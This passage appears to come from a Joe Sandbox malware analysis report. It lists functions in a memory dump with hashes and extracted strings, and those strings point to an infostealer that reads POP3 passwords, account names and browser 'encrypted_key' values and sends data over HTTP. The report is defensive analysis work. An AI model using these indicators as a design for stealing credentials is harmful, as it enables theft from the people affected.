                                                                                                                        • Instruction Fuzzy Hash: 93315DB1D04218DFEB10DFA4D848BEEBBB5BF15308F00419DD518AB281D7B95A48CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050468F4 Relevance: 17.7, Strings: 14, Instructions: 163COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                        • API String ID: 0-734595753
                                                                                                                        • Opcode ID: 8c91ce90f2d0f4b3590d5ce727ad10b732f2053edd8556ecf598059c30ddb6d2
                                                                                                                        • Instruction ID: 8d1afddbcc69671b552d14d22d141e9234de796fc8ce0315c38ce499adad0b7d
                                                                                                                        • Opcode Fuzzy Hash: 8c91ce90f2d0f4b3590d5ce727ad10b732f2053edd8556ecf598059c30ddb6d2
                                                                                                                        • Instruction Fuzzy Hash: EC51B1B6D00318AADB60DFA4DC58FEF73B8EF54704F044298EA4856141EBB56688CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05046E64 Relevance: 17.7, Strings: 14, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                        • API String ID: 0-734595753
                                                                                                                        • Opcode ID: 08aea13bbd53ddbd6d312c01f88da486ad961603b588ef73bc9f9c9c14622c65
                                                                                                                        • Instruction ID: 3dcc0ec26bcdf55490e044a7bb07a8c83fbfc8e1be8bc7eedd3f3bd211fd3690
                                                                                                                        • Opcode Fuzzy Hash: 08aea13bbd53ddbd6d312c01f88da486ad961603b588ef73bc9f9c9c14622c65
                                                                                                                        • Instruction Fuzzy Hash: 7051B5B6D00218AADB60DB94DC58FEF73BDEF54704F004298EA4956141EBB56688CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043734 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                        • API String ID: 0-392141074
                                                                                                                        • Opcode ID: 02ab4b3bc4ba25f4c06a133773d830671b2394c40a667c2bccd697e74d86c5ce
                                                                                                                        • Instruction ID: 7703251965da221abd990f1b55d7fefcff205e861dcebe0e1f46f9896686cb1d
                                                                                                                        • Opcode Fuzzy Hash: 02ab4b3bc4ba25f4c06a133773d830671b2394c40a667c2bccd697e74d86c5ce
                                                                                                                        • Instruction Fuzzy Hash: 057153B1E10218AADB15DB94DC59FEFB77CBF14704F04419DEA08A6140EB746B48CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0503EF74 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                                        • API String ID: 0-2356907671
                                                                                                                        • Opcode ID: 6f5c82126e3493ceae3ee95127482b6c3b8d69aa57453b68eca8a7cff9232332
                                                                                                                        • Instruction ID: dde3232e7dba720e4fec5f6393fe89dc0cc30abbad2b11ceb42e88f2377efb11
                                                                                                                        • Opcode Fuzzy Hash: 6f5c82126e3493ceae3ee95127482b6c3b8d69aa57453b68eca8a7cff9232332
                                                                                                                        • Instruction Fuzzy Hash: 1381A6B2D00318AAEB51EBA4DC99FEF73BCEF64710F044599B908A6140EB755748CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05044A64 Relevance: 15.2, Strings: 12, Instructions: 151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$T$d$d$f$i$r$r$u$x
                                                                                                                        • API String ID: 0-2987356081
                                                                                                                        • Opcode ID: 25bb4d1f4f153c40ff0ea367cc05c7756a0e230a2865cd1d61a9490947c7d4f2
                                                                                                                        • Instruction ID: f944752ab6105e620c0bb6780ff5201f9287daa57db988c4bc8a9af3524322a1
                                                                                                                        • Opcode Fuzzy Hash: 25bb4d1f4f153c40ff0ea367cc05c7756a0e230a2865cd1d61a9490947c7d4f2
                                                                                                                        • Instruction Fuzzy Hash: 3C41B4F1900314AAEB21EB51AC4DFFFBBBCAF55750F04412DE90566180E7B65249CBB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05038FB4 Relevance: 13.9, Strings: 11, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                        • API String ID: 0-685823316
                                                                                                                        • Opcode ID: 4d1eb9fd14c702dc3f9129982807ad67c1492714bc4512e988dfa22c3ae3b9e8
                                                                                                                        • Instruction ID: 02e912aa3fcf15a4b4fb81efc8a5f30565e6a92aef4e04d423753948a418a3bf
                                                                                                                        • Opcode Fuzzy Hash: 4d1eb9fd14c702dc3f9129982807ad67c1492714bc4512e988dfa22c3ae3b9e8
                                                                                                                        • Instruction Fuzzy Hash: 9D415EB1E00208AFDB10DFD5DC84AEEBBBDFB58304F40855DE618A6200D7755A448FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05048314 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                        • API String ID: 0-2304485323
                                                                                                                        • Opcode ID: 4b546a8493a5141e55bd4629f84efbbed14134d6a4d0bb14840e7bb1c2cc492c
                                                                                                                        • Instruction ID: c7598bd1398b439c60732d313548fdc9ebe0ea6e893659778aa5af9888e91c50
                                                                                                                        • Opcode Fuzzy Hash: 4b546a8493a5141e55bd4629f84efbbed14134d6a4d0bb14840e7bb1c2cc492c
                                                                                                                        • Instruction Fuzzy Hash: C0D1C9B1A00308AFDB50DBA4DC59FEEB7B9BF58310F04851DEA19A7240E778A905CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045197 Relevance: 12.6, Strings: 10, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$unt$unt$word$word
                                                                                                                        • API String ID: 0-861207480
                                                                                                                        • Opcode ID: d8d94248d9f016405e7463ad22173ff76345c472a451339da15f5c9e9d0b9897
                                                                                                                        • Instruction ID: d5458d9b7e67de942c025a138ec88cb642d367342206b4b5aaf39fb2de4998da
                                                                                                                        • Opcode Fuzzy Hash: d8d94248d9f016405e7463ad22173ff76345c472a451339da15f5c9e9d0b9897
                                                                                                                        • Instruction Fuzzy Hash: 2A4107B1D01358AEDB61CFA99845BEEBBF4BF59314F10406AE908EB241E7700A45CF91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050395F4 Relevance: 11.4, Strings: 9, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C$U$a$b$d$i$k$n$o
                                                                                                                        • API String ID: 0-3121204512
                                                                                                                        • Opcode ID: 3233a4e03917be03cf3f43efc471e848f445aa6afab4feaeef6880d491b40cb4
                                                                                                                        • Instruction ID: 59593a15e07780b32bbdca75ee94c447e5df7bac57ff856896c5b2839c7f2fdc
                                                                                                                        • Opcode Fuzzy Hash: 3233a4e03917be03cf3f43efc471e848f445aa6afab4feaeef6880d491b40cb4
                                                                                                                        • Instruction Fuzzy Hash: 624162B1A00308AAEB10EFA4EC89FFFB7BDAF95714F008418ED15A7240D7B456458B75
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05044794 Relevance: 10.2, Strings: 8, Instructions: 235COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: URL: $URL: $.$e$i$n$o$p
                                                                                                                        • API String ID: 0-3231755416
                                                                                                                        • Opcode ID: 8bb8f7ef68afdbbdd9d4e58a17eb36bebb3ddde4dce49fa7f9386cbd92a465ae
                                                                                                                        • Instruction ID: 98a7c15d7cf78c84321aef6d992e015f81a54097b01dff2378a7c00e4f1b321f
                                                                                                                        • Opcode Fuzzy Hash: 8bb8f7ef68afdbbdd9d4e58a17eb36bebb3ddde4dce49fa7f9386cbd92a465ae
                                                                                                                        • Instruction Fuzzy Hash: 84917DB1900249AEDB20DFA4DC85FFFB7B8FF58300F044569E909AB241E770A645CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05047794 Relevance: 10.2, Strings: 8, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: :$:$P$U$U$e$l$s
                                                                                                                        • API String ID: 0-522774390
                                                                                                                        • Opcode ID: 135a509454932a97eb117cd4b8ef8a31f76ba0150df4865ca1dedafd37eb2f6d
                                                                                                                        • Instruction ID: c3fea5576629262bc8654ace65bb0fba16d51a0da0dc8ee2283c58adcd62ff3f
                                                                                                                        • Opcode Fuzzy Hash: 135a509454932a97eb117cd4b8ef8a31f76ba0150df4865ca1dedafd37eb2f6d
                                                                                                                        • Instruction Fuzzy Hash: E89138B1A00308AFDB10DFA4D859FEEB7F5FF58314F04851DA919AB240E774A905CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05047184 Relevance: 10.2, Strings: 8, Instructions: 219COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                        • API String ID: 0-2423294891
                                                                                                                        • Opcode ID: 99cb8d871e1097fd0f3dd05821ceab1ce82e751def42cba0d524dd05e09521d8
                                                                                                                        • Instruction ID: c7887f308c6ae19d4d4b5c2f7e8a5712e1c9d0ebe1c7b43f3d7bc77c1dd2e257
                                                                                                                        • Opcode Fuzzy Hash: 99cb8d871e1097fd0f3dd05821ceab1ce82e751def42cba0d524dd05e09521d8
                                                                                                                        • Instruction Fuzzy Hash: 59817EB1D00208AFDF61DFA8DC59BEEB7F8AF54300F004169EA09A7240E7755A45CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05047182 Relevance: 10.2, Strings: 8, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                        • API String ID: 0-2423294891
                                                                                                                        • Opcode ID: 388a731840690080f990a292dc9473245b0fd3d0fb049424ce7cc554098ebf2d
                                                                                                                        • Instruction ID: e2af61b29cf6ee5bfc199e4b7ad5baa44013da58434a6cb9844a67618f4f21f5
                                                                                                                        • Opcode Fuzzy Hash: 388a731840690080f990a292dc9473245b0fd3d0fb049424ce7cc554098ebf2d
                                                                                                                        • Instruction Fuzzy Hash: 7A716CB0D00348AFDF61DFA8D858BEEBBF8AF54300F104169E909AB240E7755A45CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045F9F Relevance: 10.1, Strings: 8, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: UR$8$9$B$J$L: $L: $\
                                                                                                                        • API String ID: 0-1606297875
                                                                                                                        • Opcode ID: b05a88b6b3aec90730a0835e9d2488fd946738aa8a39171cfcaa3d0508116dec
                                                                                                                        • Instruction ID: 9468bc36ef361d607cfcaa021f64dd404f064ea7f796b6d9d49b290965584ce7
                                                                                                                        • Opcode Fuzzy Hash: b05a88b6b3aec90730a0835e9d2488fd946738aa8a39171cfcaa3d0508116dec
                                                                                                                        • Instruction Fuzzy Hash: E441E2B5E103889EDB14DFE8D8447DEBBB5FF18304F00916AA008EB251E37A5A49CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045FA4 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: URL: $8$9$B$J$L: $\
                                                                                                                        • API String ID: 0-824068069
                                                                                                                        • Opcode ID: 17f4cae2561404b325b83c6767465957128d907731c47e87c5f9f53ff8ea7b1e
                                                                                                                        • Instruction ID: 549befbabe8710dcc9b8f8b75e5e7c5071aa46aa47c9d25f1dbf54c44af0d869
                                                                                                                        • Opcode Fuzzy Hash: 17f4cae2561404b325b83c6767465957128d907731c47e87c5f9f53ff8ea7b1e
                                                                                                                        • Instruction Fuzzy Hash: 3C617DB6E10248AADB14EFE4D894BEFB7B8FF58300F04456EE508E7250E7759608CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504B1F4 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L$S$\$a$c$e$l
                                                                                                                        • API String ID: 0-3322591375
                                                                                                                        • Opcode ID: ae0b5f161a51dd07db77b5d255e94abd96793cdc8da3dbcc531f22a8a94642e9
                                                                                                                        • Instruction ID: 70503677cafa983e209a4ad29406b53a00ec0fe1f0b1bde64c65c228e2dcec57
                                                                                                                        • Opcode Fuzzy Hash: ae0b5f161a51dd07db77b5d255e94abd96793cdc8da3dbcc531f22a8a94642e9
                                                                                                                        • Instruction Fuzzy Hash: 594146B2D10218AADF50DF98EC89AEFB7F9FF58710F01416AD919A7100EB7195458F90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504EF14 Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                        • API String ID: 0-1024195942
                                                                                                                        • Opcode ID: 3374b0a65de20d1f4f1f48df9ba5098bc515c2b6ff8933238c86d61ff2033665
                                                                                                                        • Instruction ID: f27d6ace8db1219d2bf521c70a34ae944d503197726cdd44aca7659c43a59cb2
                                                                                                                        • Opcode Fuzzy Hash: 3374b0a65de20d1f4f1f48df9ba5098bc515c2b6ff8933238c86d61ff2033665
                                                                                                                        • Instruction Fuzzy Hash: FD01EDB2905118AFCB14DF98D941DEF77B8FB48310F158299BE08A7240D670AE10CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504EF94 Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                        • API String ID: 0-4071423757
                                                                                                                        • Opcode ID: d05d7ae2549aa1b0eb128829449cd575820bbbb9003dff5d679e0bc57c78d2e2
                                                                                                                        • Instruction ID: bfb2949f9b6414d6ca3b720555a3dd639be088e7a5dea9a99b2a0069d0c885c1
                                                                                                                        • Opcode Fuzzy Hash: d05d7ae2549aa1b0eb128829449cd575820bbbb9003dff5d679e0bc57c78d2e2
                                                                                                                        • Instruction Fuzzy Hash: 3601E9B2A04159AFCB04DF98D845DEF77B8EB48210F158298FE09A7304D670AD10CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502FD14 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: K$N$R$U$Z$Z$r
                                                                                                                        • API String ID: 0-872163569
                                                                                                                        • Opcode ID: 19e75344674a1114cf5c0e2279c00df301facda17aa0957f4be976a77b128dab
                                                                                                                        • Instruction ID: 1758b3052f6960a40cb46af0bcf5be0650ffb98bff1e78146d45df30c29bc377
                                                                                                                        • Opcode Fuzzy Hash: 19e75344674a1114cf5c0e2279c00df301facda17aa0957f4be976a77b128dab
                                                                                                                        • Instruction Fuzzy Hash: 0311D810D087CED9DB12C7BC98186AEBF715F23225F0882D9D4E52B2D2C2B94706C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504F014 Relevance: 8.8, Strings: 7, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                        • API String ID: 0-1070052511
                                                                                                                        • Opcode ID: 6813f5447e74939c91cabb0e01709f7f4602b8939e8a7c7877ebd6049b731626
                                                                                                                        • Instruction ID: b06d8641aca75331e72ed2bbafdd44334a6995e608b3236058d001a64b92cbe8
                                                                                                                        • Opcode Fuzzy Hash: 6813f5447e74939c91cabb0e01709f7f4602b8939e8a7c7877ebd6049b731626
                                                                                                                        • Instruction Fuzzy Hash: 3F014BB2905159AFCB00DF98D8459FFBBB8EB58210F148199FD08AB304D670AE10CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504F084 Relevance: 8.8, Strings: 7, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                        • API String ID: 0-4188302782
                                                                                                                        • Opcode ID: 5c63fbc7857c6cc4cb3f1dd36b036e7f0ccc1851901804684355fc1e333f0811
                                                                                                                        • Instruction ID: 705e4b41917eab6c8cddf80e8324d6be0e55c3bc6524ad27ffb5b9b1cce18072
                                                                                                                        • Opcode Fuzzy Hash: 5c63fbc7857c6cc4cb3f1dd36b036e7f0ccc1851901804684355fc1e333f0811
                                                                                                                        • Instruction Fuzzy Hash: 7B011DB6905119AFCB00DF98D945AEFBBB8FB44210F148599ED59AB304D270AE10CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504547A Relevance: 7.8, Strings: 6, Instructions: 252COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$c$g$s$t$u
                                                                                                                        • API String ID: 0-3813946880
                                                                                                                        • Opcode ID: f13e2aaa87c64ce7b9cf88ac053aff68c480f3cdbc6b20eceb4fd219936b57e2
                                                                                                                        • Instruction ID: 1d2807ba3f849bb51f4b2514d25640a67ac176faecca4b93d8a1ef25e5da494f
                                                                                                                        • Opcode Fuzzy Hash: f13e2aaa87c64ce7b9cf88ac053aff68c480f3cdbc6b20eceb4fd219936b57e2
                                                                                                                        • Instruction Fuzzy Hash: BEA11FB5D00218ABDB65EBA4DC59FEEB3BCBF58300F0485A9E908A7140E7745B48CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05045484 Relevance: 7.8, Strings: 6, Instructions: 250COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: A$c$g$s$t$u
                                                                                                                        • API String ID: 0-3813946880
                                                                                                                        • Opcode ID: 6338b85a8ea83905db755cd4b5b529be395df7e285cbde2ecf558ce4e7db8946
                                                                                                                        • Instruction ID: 6a37d21d1ffe7963c7062cb3296cb25178579720fd5166bd74e0afba0c8963c0
                                                                                                                        • Opcode Fuzzy Hash: 6338b85a8ea83905db755cd4b5b529be395df7e285cbde2ecf558ce4e7db8946
                                                                                                                        • Instruction Fuzzy Hash: 71A11DB5D00218ABDB65EBA4DC59FEEB3BCBF58300F0445A9EA08A7140E7745B48CF65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05043504 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
